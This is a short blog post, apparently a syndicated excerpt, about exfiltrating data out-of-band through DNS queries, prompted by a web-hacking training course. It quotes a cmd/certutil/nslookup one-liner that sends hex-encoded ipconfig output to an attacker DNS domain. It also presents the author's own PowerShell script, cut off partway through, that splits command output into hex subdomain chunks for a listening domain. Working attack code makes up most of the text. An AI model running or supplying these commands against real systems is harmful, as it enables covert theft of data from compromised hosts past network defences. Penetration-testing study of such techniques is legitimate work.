Last week, I attended the NotSoSecure Advanced Web Hacking training. While there were plenty of interesting topics taught, one that caught my attention was Out-of-Band (OOB) Data Exfiltration using DNS.

Back in 2018, NotSoSecure published an Out of Band Exploitation (OOB) CheatSheet. In that document, they cover methods by which you can exfiltrate data. One of these uses files written to disk and multiple DNS queries to send large chunks of data.

cmd /v /c "ipconfig > output && certutil -encodehex -f output output.hex 4 && powershell $text=Get-Content 
output.hex;$subdomain=$text.replace(' ','');$j=11111;foreach($i in $subdomain)
{ $final=$j.tostring()+'.'+$i+'.file.oob.dnsattacker.com';$j += 1; nslookup $final }"    
# Sending file in HEX

The idea here is that the command is executed and written to a file, that file is the hex encoded with certutil, and the file is sent in bite-sized pieces to a listening DNS server. They also provide a tcpdump command to capture the data on the DNS server and a command to reconstruct the data into its original format.

I thought that this was great, but I disliked having to write files to disk and since PowerShell was already being used, I figured I could replace the entire process with a chunk of PowerShell and remove my reliance on knowing where I had write access. The end result was the following script:

$exfil_domain = '.oob.a.c0ffee.ca'
$cmd = ipconfig
$cmd = $cmd -join "`n"
$cmd.ToCharArray() | foreach-object{$char = [System.String]::Format("{0:X2}", [System.Convert]::ToUInt32($_))
$subdomain += $char}
$id=11111
for($i = 0; $i -lt $subdomain.Length; $i += 32) {
    try {
        $final=$id.tostring()+'.'+$subdomain.SubString($i, 32) + $exfil_domain
    }
    catch [ArgumentOutOfRangeException] {
        $final=$id.tostring()+'.'+$subdomain.SubString($i) + $exfil_domain
   (Read more...)